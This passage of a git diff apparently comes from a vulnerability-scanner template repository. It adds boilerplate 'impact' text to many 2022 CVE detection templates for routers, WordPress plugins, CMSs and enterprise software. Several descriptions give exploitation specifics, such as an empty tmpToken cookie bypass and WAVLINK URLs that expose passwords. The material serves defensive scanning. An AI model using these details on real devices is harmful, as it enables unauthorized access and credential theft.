b/http/cves/2022/CVE-2022-33174.yaml index 7af5c0ab0c..58f4240015 100644 --- a/http/cves/2022/CVE-2022-33174.yaml +++ b/http/cves/2022/CVE-2022-33174.yaml 
@@ -6,6 +6,8 @@ info: severity: high description: | Powertek firmware (multiple brands) before 3.30.30 running Power Distribution Units are vulnerable to authorization bypass in the web interface. To exploit the vulnerability, an attacker must send an HTTP packet to the data retrieval interface (/cgi/get_param.cgi) with the tmpToken cookie set to an empty string followed by a semicolon. This bypasses an active session authorization check. This can be then used to fetch the values of protected sys.passwd and sys.su.name fields that contain the username and password in cleartext. + impact: | + An attacker can bypass authentication and gain unauthorized access to the Powertek Firmware, potentially leading to further compromise of the system. remediation: | Upgrade the Powertek Firmware to version 3.30.30 or higher to mitigate the vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-33891.yaml b/http/cves/2022/CVE-2022-33891.yaml index 84ab50d86e..20f3824983 100644 --- a/http/cves/2022/CVE-2022-33891.yaml +++ b/http/cves/2022/CVE-2022-33891.yaml 
@@ -6,6 +6,8 @@ info: severity: high description: | Apache Spark UI is susceptible to remote command injection. ACLs can be enabled via the configuration option spark.acls.enable. With an authentication filter, this checks whether a user has access permissions to view or modify the application. If ACLs are enabled, a code path in HttpSecurityFilter can allow impersonation by providing an arbitrary user name. An attacker can potentially reach a permission check function that will ultimately build a Unix shell command based on input and execute it, resulting in arbitrary shell command execution. Affected versions are 3.0.3 and earlier, 3.1.1 to 3.1.2, and 3.2.0 to 3.2.1. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access, data leakage, and potential compromise of the entire system. remediation: | Apply the latest security patches or updates provided by Apache Spark to fix the remote command injection vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-33901.yaml b/http/cves/2022/CVE-2022-33901.yaml index 43f3120f3a..0f9544ddbd 100644 --- a/http/cves/2022/CVE-2022-33901.yaml +++ b/http/cves/2022/CVE-2022-33901.yaml @@ -6,6 +6,8 @@ info: severity: high description: | WordPress MultiSafepay for WooCommerce plugin through 4.13.1 contains an arbitrary file read vulnerability. An attacker can potentially obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. + impact: | + An attacker can access sensitive information stored in arbitrary files on the server, potentially leading to further compromise of the system. remediation: | Update WordPress MultiSafepay for WooCommerce plugin to version 4.13.1 or later. reference: diff --git a/http/cves/2022/CVE-2022-33965.yaml b/http/cves/2022/CVE-2022-33965.yaml index 26c52cdbf5..1de1a82a6e 100644 --- a/http/cves/2022/CVE-2022-33965.yaml +++ b/http/cves/2022/CVE-2022-33965.yaml 
@@ -6,6 +6,8 @@ info: severity: critical description: | WordPress Visitor Statistics plugin through 5.7 contains multiple unauthenticated SQL injection vulnerabilities. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or further compromise of the WordPress site. remediation: | Update to the latest version of the WordPress Visitor Statistics plugin (>=5.8) to mitigate the SQL Injection vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-34045.yaml b/http/cves/2022/CVE-2022-34045.yaml index f7fba31b34..df01533acd 100644 --- a/http/cves/2022/CVE-2022-34045.yaml +++ b/http/cves/2022/CVE-2022-34045.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | WAVLINK WN530HG4 M30HG4.V5030.191116 is susceptible to improper access control. It contains a hardcoded encryption/decryption key for its configuration files at /etc_ro/lighttpd/www/cgi-bin/ExportAllSettings.sh. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized operations. + impact: | + An attacker can exploit this vulnerability to gain unauthorized access to the router's settings and potentially compromise the network. remediation: | Apply the latest firmware update provided by the vendor to fix the access control issue. reference: diff --git a/http/cves/2022/CVE-2022-34046.yaml b/http/cves/2022/CVE-2022-34046.yaml index a67b6bb4ed..bfb27eedfd 100644 --- a/http/cves/2022/CVE-2022-34046.yaml +++ b/http/cves/2022/CVE-2022-34046.yaml 
@@ -6,6 +6,8 @@ info: severity: high description: | WAVLINK WN533A8 M33A8.V5030.190716 is susceptible to improper access control. An attacker can obtain usernames and passwords via view-source:http://IP_ADDRESS/sysinit.shtml?r=52300 and searching for [logincheck(user);] and thereby possibly obtain sensitive information, modify data, and/or execute unauthorized operations. + impact: | + An attacker can exploit this vulnerability to gain unauthorized access to the router's settings and potentially compromise the entire network. remediation: | Apply the latest firmware update provided by the vendor to fix the access control issue. reference: diff --git a/http/cves/2022/CVE-2022-34047.yaml b/http/cves/2022/CVE-2022-34047.yaml index 158a3a876c..b2fbef32fe 100644 --- a/http/cves/2022/CVE-2022-34047.yaml +++ b/http/cves/2022/CVE-2022-34047.yaml @@ -6,6 +6,8 @@ info: severity: high description: | WAVLINK WN530HG4 M30HG4.V5030.191116 is susceptible to improper access control. An attacker can obtain usernames and passwords via view-source:http://IP_ADDRESS/set_safety.shtml?r=52300 and searching for [var syspasswd] and thereby possibly obtain sensitive information, modify data, and/or execute unauthorized operations. + impact: | + An attacker can exploit this vulnerability to gain unauthorized access to the router's settings and potentially compromise the network. remediation: | Apply the latest firmware update provided by the vendor to fix the access control issue. reference: diff --git a/http/cves/2022/CVE-2022-34048.yaml b/http/cves/2022/CVE-2022-34048.yaml index 30f6a907ca..6c4b7aa5b1 100644 --- a/http/cves/2022/CVE-2022-34048.yaml +++ b/http/cves/2022/CVE-2022-34048.yaml 
@@ -6,6 +6,8 @@ info: severity: medium description: | Wavlink WN-533A8 M33A8.V5030.190716 contains a reflected cross-site scripting vulnerability via the login_page parameter. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of a victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information. remediation: | Apply the latest firmware update provided by the vendor to mitigate this vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-34049.yaml b/http/cves/2022/CVE-2022-34049.yaml index 422d357e59..050f3ec75f 100644 --- a/http/cves/2022/CVE-2022-34049.yaml +++ b/http/cves/2022/CVE-2022-34049.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Wavlink WN530HG4 M30HG4.V5030.191116 is susceptible to improper access control. An attacker can download log files and configuration data via Exportlogs.sh and possibly obtain sensitive information, modify data, and/or execute unauthorized operations. + impact: | + An attacker can exploit this vulnerability to gain unauthorized access to the router's settings, potentially leading to further compromise of the network or device. remediation: | Apply the latest firmware update provided by the vendor to fix the access control issue. reference: diff --git a/http/cves/2022/CVE-2022-34121.yaml b/http/cves/2022/CVE-2022-34121.yaml index 5d50f2a3fa..0bc77347a4 100644 --- a/http/cves/2022/CVE-2022-34121.yaml +++ b/http/cves/2022/CVE-2022-34121.yaml @@ -6,6 +6,8 @@ info: severity: high description: | Cuppa CMS v1.0 is vulnerable to local file inclusion via the component /templates/default/html/windows/right.php. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access, sensitive information disclosure, and potential remote code execution. remediation: | Upgrade to the latest version of CuppaCMS or apply the provided patch to fix the LFI vulnerability. reference: 
diff --git a/http/cves/2022/CVE-2022-34328.yaml b/http/cves/2022/CVE-2022-34328.yaml index a5f21f2eff..97a1686a81 100644 --- a/http/cves/2022/CVE-2022-34328.yaml +++ b/http/cves/2022/CVE-2022-34328.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | PMB 7.3.10 contains a reflected cross-site scripting vulnerability via the id parameter in an lvl=author_see request to index.php. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the victim's browser, leading to session hijacking, defacement, or theft of sensitive information. remediation: | Apply the latest security patch or upgrade to a non-vulnerable version of PMB. reference: diff --git a/http/cves/2022/CVE-2022-34576.yaml b/http/cves/2022/CVE-2022-34576.yaml index 8c402cd042..adfbe0d694 100644 --- a/http/cves/2022/CVE-2022-34576.yaml +++ b/http/cves/2022/CVE-2022-34576.yaml @@ -6,6 +6,8 @@ info: severity: high description: | WAVLINK WN535 G3 M35G3R.V5030.180927 is susceptible to improper access control. A vulnerability in /cgi-bin/ExportAllSettings.sh allows an attacker to execute arbitrary code via a crafted POST request and thereby possibly obtain sensitive information, modify data, and/or execute unauthorized operations. + impact: | + An attacker can exploit this vulnerability to gain unauthorized access to the router's settings and potentially compromise the network. remediation: | Apply the latest firmware update provided by the vendor to fix the access control issue. reference: diff --git a/http/cves/2022/CVE-2022-34590.yaml b/http/cves/2022/CVE-2022-34590.yaml index 8eb5c44bba..264daf6e0d 100644 --- a/http/cves/2022/CVE-2022-34590.yaml +++ b/http/cves/2022/CVE-2022-34590.yaml 
@@ -6,6 +6,8 @@ info: severity: high description: | Hospital Management System 1.0 contains a SQL injection vulnerability via the editid parameter in /HMS/admin.php. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation. remediation: | Upgrade to the latest version to mitigate this vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-34753.yaml b/http/cves/2022/CVE-2022-34753.yaml index 9ed2db4094..7cd43a80d6 100644 --- a/http/cves/2022/CVE-2022-34753.yaml +++ b/http/cves/2022/CVE-2022-34753.yaml @@ -6,6 +6,8 @@ info: severity: high description: | SpaceLogic C-Bus Home Controller through 1.31.460 is susceptible to remote command execution via improper neutralization of special elements. Remote root exploit can be enabled when the command is compromised, and an attacker can potentially execute malware, obtain sensitive information, modify data, and/or gain full control without entering necessary credentials. + impact: | + Successful exploitation of this vulnerability allows remote attackers to execute arbitrary commands on the affected system. remediation: | Upgrade SpaceLogic C-Bus Home Controller to a version higher than 1.31.460 to mitigate this vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-3484.yaml b/http/cves/2022/CVE-2022-3484.yaml index 910cc72466..8f8e836d24 100644 --- a/http/cves/2022/CVE-2022-3484.yaml +++ b/http/cves/2022/CVE-2022-3484.yaml 
@@ -6,6 +6,8 @@ info: severity: medium description: | WordPress wpb-show-core plugin through TODO contains a cross-site scripting vulnerability. The plugin does not sanitize and escape a parameter before outputting it back in the page. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access, data theft, and potential compromise of the affected WordPress website. remediation: | Update to the latest version of the WPB Show Core plugin, which includes a fix for the XSS vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-3506.yaml b/http/cves/2022/CVE-2022-3506.yaml index 7ed150f35d..4b66640437 100644 --- a/http/cves/2022/CVE-2022-3506.yaml +++ b/http/cves/2022/CVE-2022-3506.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | WordPress Related Posts plugin prior to 2.1.3 contains a cross-site scripting vulnerability in the rp4wp[heading_text] parameter. User input is not properly sanitized, allowing the insertion of arbitrary code that can allow an attacker to steal cookie-based authentication credentials and launch other attacks. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into the website, potentially leading to unauthorized access, data theft, or defacement. remediation: | Update to the latest version of the WordPress Related Posts plugin (2.1.3 or higher) to mitigate the vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-35151.yaml b/http/cves/2022/CVE-2022-35151.yaml index 460dcfcbe0..6f2f985d18 100644 --- a/http/cves/2022/CVE-2022-35151.yaml +++ b/http/cves/2022/CVE-2022-35151.yaml 
@@ -6,6 +6,8 @@ info: severity: medium description: | kkFileView 4.1.0 contains multiple cross-site scripting vulnerabilities via the urls and currentUrl parameters at /controller/OnlinePreviewController.java. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, leading to potential data theft, session hijacking, or defacement. remediation: | To mitigate this vulnerability, it is recommended to update kkFileView to the latest version or apply a patch provided by the vendor. reference: diff --git a/http/cves/2022/CVE-2022-35405.yaml b/http/cves/2022/CVE-2022-35405.yaml index 1cd97a1d83..9c16c46895 100644 --- a/http/cves/2022/CVE-2022-35405.yaml +++ b/http/cves/2022/CVE-2022-35405.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | Zoho ManageEngine Password Manager Pro, PAM 360, and Access Manager Plus are susceptible to unauthenticated remote code execution via XML-RPC. An attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system. remediation: | Apply the latest security patch or update provided by Zoho ManageEngine to fix the vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-35413.yaml b/http/cves/2022/CVE-2022-35413.yaml index f97f03812e..7a14313ab1 100644 --- a/http/cves/2022/CVE-2022-35413.yaml +++ b/http/cves/2022/CVE-2022-35413.yaml 
@@ -6,6 +6,8 @@ info: severity: critical description: | WAPPLES Web Application Firewall through 6.0 contains a hardcoded credentials vulnerability. It contains a hardcoded system account accessible via db/wp.no1, as configured in the /opt/penta/wapples/script/wcc_auto_scaling.py file. An attacker can use this account to access system configuration and confidential information, such as SSL keys, via an HTTPS request to the /webapi/ URI on port 443 or 5001. + impact: | + An attacker can exploit this vulnerability to gain unauthorized access to the WAPPLES Web Application Firewall. remediation: | Upgrade to a version of WAPPLES Web Application Firewall that does not contain hardcoded credentials or apply the vendor-provided patch to fix the vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-35416.yaml b/http/cves/2022/CVE-2022-35416.yaml index f05198b823..3140d08627 100644 --- a/http/cves/2022/CVE-2022-35416.yaml +++ b/http/cves/2022/CVE-2022-35416.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | H3C SSL VPN 2022-07-10 and prior contains a cookie-based cross-site scripting vulnerability in wnm/login/login.json svpnlang. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the victim's browser, potentially leading to session hijacking, data theft, or other malicious activities. remediation: | Apply the latest security patch or upgrade to a version of H3C SSL VPN that is not affected by this vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-35493.yaml b/http/cves/2022/CVE-2022-35493.yaml index 102e3eca3f..b0d9d1437c 100644 --- a/http/cves/2022/CVE-2022-35493.yaml +++ b/http/cves/2022/CVE-2022-35493.yaml 
@@ -6,6 +6,8 @@ info: severity: medium description: | eShop 3.0.4 contains a reflected cross-site scripting vulnerability in json search parse and json response in wrteam.in. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the website. remediation: | To remediate this issue, the application should implement proper input validation and sanitization techniques to prevent the execution of malicious scripts. reference: diff --git a/http/cves/2022/CVE-2022-3578.yaml b/http/cves/2022/CVE-2022-3578.yaml index 288a7e6a0f..d37fc8f923 100644 --- a/http/cves/2022/CVE-2022-3578.yaml +++ b/http/cves/2022/CVE-2022-3578.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | WordPress ProfileGrid plugin prior to 5.1.1 contains a cross-site scripting vulnerability. The plugin does not sanitize and escape a parameter before outputting it back in the page. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement. remediation: | Update WordPress ProfileGrid to version 5.1.1 or later to mitigate the XSS vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-35914.yaml b/http/cves/2022/CVE-2022-35914.yaml index df730555e2..28a35f4d4a 100644 --- a/http/cves/2022/CVE-2022-35914.yaml +++ b/http/cves/2022/CVE-2022-35914.yaml 
@@ -6,6 +6,8 @@ info: severity: critical description: | GLPI through 10.0.2 is susceptible to remote command execution injection in /vendor/htmlawed/htmlawed/htmLawedTest.php in the htmlawed module. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary commands on the target system. remediation: | Upgrade GLPI to a version higher than 10.0.2 to mitigate this vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-36446.yaml b/http/cves/2022/CVE-2022-36446.yaml index a7f33dfe14..96433b9af8 100644 --- a/http/cves/2022/CVE-2022-36446.yaml +++ b/http/cves/2022/CVE-2022-36446.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | Webmin before 1.997 is susceptible to authenticated remote code execution via software/apt-lib.pl, which lacks HTML escaping for a UI command. An attacker can perform command injection attacks and thereby execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials. + impact: | + Successful exploitation of this vulnerability allows an authenticated attacker to execute arbitrary code on the target system. remediation: | Upgrade Webmin to version 1.997 or later to mitigate this vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-36537.yaml b/http/cves/2022/CVE-2022-36537.yaml index 665248998f..607ab07bae 100644 --- a/http/cves/2022/CVE-2022-36537.yaml +++ b/http/cves/2022/CVE-2022-36537.yaml 
@@ -6,6 +6,8 @@ info: severity: high description: | ZK Framework 9.6.1, 9.6.0.1, 9.5.1.3, 9.0.1.2 and 8.6.4.1 is susceptible to information disclosure. An attacker can access sensitive information via a crafted POST request to the component AuUploader and thereby possibly obtain additional sensitive information, modify data, and/or execute unauthorized operations. + impact: | + The vulnerability can lead to the exposure of sensitive data, such as credentials or internal system information. remediation: | Apply the latest security patches or updates provided by the ZK Framework to fix the information disclosure vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-36642.yaml b/http/cves/2022/CVE-2022-36642.yaml index a91bab8cdd..c9f0ec188f 100644 --- a/http/cves/2022/CVE-2022-36642.yaml +++ b/http/cves/2022/CVE-2022-36642.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | Telos Alliance Omnia MPX Node through 1.5.0+r1 is vulnerable to local file inclusion via logs/downloadMainLog. By retrieving userDB.json allows an attacker to retrieve cleartext credentials and escalate privileges via the control panel. + impact: | + Successful exploitation of this vulnerability could allow an attacker to read arbitrary files on the server, potentially leading to further compromise of the system. remediation: | Apply the latest security patch or upgrade to a non-vulnerable version of Omnia MPX. reference: diff --git a/http/cves/2022/CVE-2022-36804.yaml b/http/cves/2022/CVE-2022-36804.yaml index ee277ea98c..4ad733a478 100644 --- a/http/cves/2022/CVE-2022-36804.yaml +++ b/http/cves/2022/CVE-2022-36804.yaml 
@@ -6,6 +6,8 @@ info: severity: high description: | Atlassian Bitbucket Server and Data Center is susceptible to remote command injection. Multiple API endpoints can allow an attacker with read permissions to a public or private Bitbucket repository to execute arbitrary code by sending a malicious HTTP request, thus making it possible to obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials. Affected versions are 7.0.0 before version 7.6.17, from version 7.7.0 before version 7.17.10, from version 7.18.0 before version 7.21.4, from version 8.0.0 before version 8.0.3, from version 8.1.0 before version 8.1.3, and from version 8.2.0 before version 8.2.2, and from version 8.3.0 before 8.3.1. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access, data leakage, and potential compromise of the entire system. remediation: | Apply the latest security patches provided by Atlassian to mitigate the vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-36883.yaml b/http/cves/2022/CVE-2022-36883.yaml index 4e0349e132..b8e76f1d78 100644 --- a/http/cves/2022/CVE-2022-36883.yaml +++ b/http/cves/2022/CVE-2022-36883.yaml @@ -5,6 +5,8 @@ info: author: c-sh0 severity: high description: Jenkins Git plugin through 4.11.3 contains a missing authorization check. An attacker can trigger builds of jobs configured to use an attacker-specified Git repository and to cause them to check out an attacker-specified commit. This can make it possible to obtain sensitive information, modify data, and/or execute unauthorized operations. + impact: | + This vulnerability can lead to unauthorized access to sensitive data and unauthorized actions being performed on the Jenkins Git plugin. remediation: | Upgrade to a fixed version of the Jenkins Git plugin (>=4.11.4) or apply the provided patch to mitigate the vulnerability. reference: 
diff --git a/http/cves/2022/CVE-2022-37190.yaml b/http/cves/2022/CVE-2022-37190.yaml index 22642b90fc..5cc91a2358 100644 --- a/http/cves/2022/CVE-2022-37190.yaml +++ b/http/cves/2022/CVE-2022-37190.yaml @@ -6,6 +6,8 @@ info: severity: high description: | CuppaCMS 1.0 is vulnerable to Remote Code Execution (RCE). An authenticated user can control both parameters (action and function) from "/api/index.php. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system. remediation: | Apply the latest security patch or update to a patched version of Cuppa CMS v1.0 to mitigate this vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-37191.yaml b/http/cves/2022/CVE-2022-37191.yaml index 21bb7f0720..1fdfc8fb30 100644 --- a/http/cves/2022/CVE-2022-37191.yaml +++ b/http/cves/2022/CVE-2022-37191.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | The component "cuppa/api/index.php" of CuppaCMS v1.0 is Vulnerable to LFI. An authenticated user can read system files via crafted POST request using [function] parameter value as LFI payload. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files, potential data leakage, and remote code execution. remediation: | Apply the latest security patches or updates provided by the vendor to fix the authenticated local file inclusion vulnerability in Cuppa CMS v1.0. reference: diff --git a/http/cves/2022/CVE-2022-37299.yaml b/http/cves/2022/CVE-2022-37299.yaml index e49f389f39..496dce9711 100644 --- a/http/cves/2022/CVE-2022-37299.yaml +++ b/http/cves/2022/CVE-2022-37299.yaml 
@@ -5,6 +5,8 @@ info: author: pikpikcu severity: medium description: Shirne CMS 1.2.0 is vulnerable to local file inclusion which could cause arbitrary file read via /static/ueditor/php/controller.php. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files, remote code execution, and potential compromise of the entire system. remediation: | Upgrade to the latest version of Shirne CMS or apply the vendor-provided patch to mitigate the LFI vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-3768.yaml b/http/cves/2022/CVE-2022-3768.yaml index 34e1ef91de..5f97231b6a 100644 --- a/http/cves/2022/CVE-2022-3768.yaml +++ b/http/cves/2022/CVE-2022-3768.yaml @@ -6,6 +6,8 @@ info: severity: high description: | WordPress WPSmartContracts plugin before 1.3.12 contains a SQL injection vulnerability. The plugin does not properly sanitize and escape a parameter before using it in a SQL statement. An attacker with a role as low as author can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations. + impact: | + An attacker can execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation. remediation: Fixed in version 1.3.12 reference: - https://wpscan.com/vulnerability/1d8bf5bb-5a17-49b7-a5ba-5f2866e1f8a3 diff --git a/http/cves/2022/CVE-2022-3800.yaml b/http/cves/2022/CVE-2022-3800.yaml index 3c2bbcc7a2..42391aa1d6 100644 --- a/http/cves/2022/CVE-2022-3800.yaml +++ b/http/cves/2022/CVE-2022-3800.yaml 
@@ -6,6 +6,8 @@ info: severity: high description: | IBAX go-ibax functionality is susceptible to SQL injection via the file /api/v2/open/rowsInfo. The manipulation of the argument table_name leads to SQL injection, and the attack may be launched remotely. An attacker can potentially obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access, data leakage, and potential compromise of the entire system. remediation: | To remediate this vulnerability, ensure that all user-supplied input is properly validated and sanitized before being used in SQL queries. Implement parameterized queries or use an ORM framework to prevent SQL injection attacks. reference: diff --git a/http/cves/2022/CVE-2022-38295.yaml b/http/cves/2022/CVE-2022-38295.yaml index 1898e9c35e..0756ad6957 100644 --- a/http/cves/2022/CVE-2022-38295.yaml +++ b/http/cves/2022/CVE-2022-38295.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Cuppa CMS v1.0 was discovered to contain a cross-site scripting vulnerability at /table_manager/view/cu_user_groups. This vulnerability allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Name field under the Add New Group function. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to session hijacking, defacement, or theft of sensitive information. remediation: | To remediate this vulnerability, it is recommended to implement proper input validation and sanitization techniques to prevent the execution of malicious scripts. reference: diff --git a/http/cves/2022/CVE-2022-38296.yaml b/http/cves/2022/CVE-2022-38296.yaml index 58bac98117..832437cd0b 100644 --- a/http/cves/2022/CVE-2022-38296.yaml +++ b/http/cves/2022/CVE-2022-38296.yaml 
@@ -6,6 +6,8 @@ info: severity: critical description: | Cuppa CMS v1.0 was discovered to contain an arbitrary file upload vulnerability via the File Manager. + impact: | + Successful exploitation of this vulnerability can lead to remote code execution and compromise of the affected system. remediation: | Apply the latest patch or upgrade to a newer version of Cuppa CMS to mitigate this vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-38463.yaml b/http/cves/2022/CVE-2022-38463.yaml index 7276d2328d..a335c2683c 100644 --- a/http/cves/2022/CVE-2022-38463.yaml +++ b/http/cves/2022/CVE-2022-38463.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | ServiceNow through San Diego Patch 4b and Patch 6 contains a cross-site scripting vulnerability in the logout functionality, which can enable an unauthenticated remote attacker to execute arbitrary JavaScript. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, data theft, or defacement of the affected ServiceNow instance. remediation: | Apply the latest security patches provided by ServiceNow to mitigate this vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-38467.yaml b/http/cves/2022/CVE-2022-38467.yaml index 4b1dfe2c0a..6d7aef8b1a 100644 --- a/http/cves/2022/CVE-2022-38467.yaml +++ b/http/cves/2022/CVE-2022-38467.yaml 
@@ -6,6 +6,8 @@ info: severity: medium description: | The plugin does not sanitise and escape some parameters from a sample file before outputting them back in the page, leading to Reflected Cross-Site Scripting + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information. remediation: Fixed in version 1.1.1 reference: - https://wpscan.com/vulnerability/4b128c9c-366e-46af-9dd2-e3a9624e3a53 diff --git a/http/cves/2022/CVE-2022-38553.yaml b/http/cves/2022/CVE-2022-38553.yaml index 6b3c874da9..d5be904f4c 100644 --- a/http/cves/2022/CVE-2022-38553.yaml +++ b/http/cves/2022/CVE-2022-38553.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Academy Learning Management System before 5.9.1 contains a cross-site scripting vulnerability via the Search parameter. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website. remediation: | Upgrade to Academy Learning Management System version 5.9.1 or later to mitigate the XSS vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-38637.yaml b/http/cves/2022/CVE-2022-38637.yaml index f4f6a2e7e4..dce2d2e8f1 100644 --- a/http/cves/2022/CVE-2022-38637.yaml +++ b/http/cves/2022/CVE-2022-38637.yaml 
@@ -6,6 +6,8 @@ info: severity: critical description: | Hospital Management System 1.0 contains a SQL injection vulnerability via the editid parameter in /HMS/user-login.php. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation. remediation: | Upgrade to the latest version to mitigate this vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-38794.yaml b/http/cves/2022/CVE-2022-38794.yaml index b94e02c18e..ab8e6d0bb0 100644 --- a/http/cves/2022/CVE-2022-38794.yaml +++ b/http/cves/2022/CVE-2022-38794.yaml @@ -6,6 +6,8 @@ info: severity: high description: | Zaver through 2020-12-15 is vulnerable to local file inclusion via the GET /.. substring. + impact: | + This vulnerability can lead to unauthorized access, data leakage, and remote code execution. remediation: | To remediate this vulnerability, ensure that user input is properly validated and sanitized before being used in file inclusion operations. reference: diff --git a/http/cves/2022/CVE-2022-38817.yaml b/http/cves/2022/CVE-2022-38817.yaml index 486b7959b7..ebe9eada08 100644 --- a/http/cves/2022/CVE-2022-38817.yaml +++ b/http/cves/2022/CVE-2022-38817.yaml @@ -6,6 +6,8 @@ info: severity: high description: | Dapr Dashboard 0.1.0 through 0.10.0 is susceptible to improper access control. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized operations. + impact: | + The vulnerability allows unauthorized access to the Dapr Dashboard, potentially leading to unauthorized actions and data exposure. remediation: | Upgrade Dapr Dashboard to a version that includes the fix for CVE-2022-38817 or apply the necessary patches provided by the vendor. reference: 
diff --git a/http/cves/2022/CVE-2022-38870.yaml b/http/cves/2022/CVE-2022-38870.yaml index 4eec3c0609..9034b5d9d8 100644 --- a/http/cves/2022/CVE-2022-38870.yaml +++ b/http/cves/2022/CVE-2022-38870.yaml @@ -6,6 +6,8 @@ info: severity: high description: | Free5gc 3.2.1 is susceptible to information disclosure. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized operations. + impact: | + Successful exploitation of this vulnerability could result in unauthorized access to sensitive information. remediation: | Apply the latest patch or upgrade to a patched version of Free5gc 3.2.1 to mitigate the vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-3908.yaml b/http/cves/2022/CVE-2022-3908.yaml index 085cd55ce7..4613f8d9bb 100644 --- a/http/cves/2022/CVE-2022-3908.yaml +++ b/http/cves/2022/CVE-2022-3908.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | WordPress Helloprint plugin before 1.4.7 contains a cross-site scripting vulnerability. The plugin does not sanitize and escape a parameter before outputting it back in the page. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + impact: | + Successful exploitation of this vulnerability could lead to cross-site scripting (XSS) attacks, potentially allowing an attacker to execute malicious scripts on the victim's browser. remediation: Fixed in version 1.4.7. reference: - https://wpscan.com/vulnerability/c44802a0-8cbe-4386-9523-3b6cb44c6505 diff --git a/http/cves/2022/CVE-2022-39195.yaml 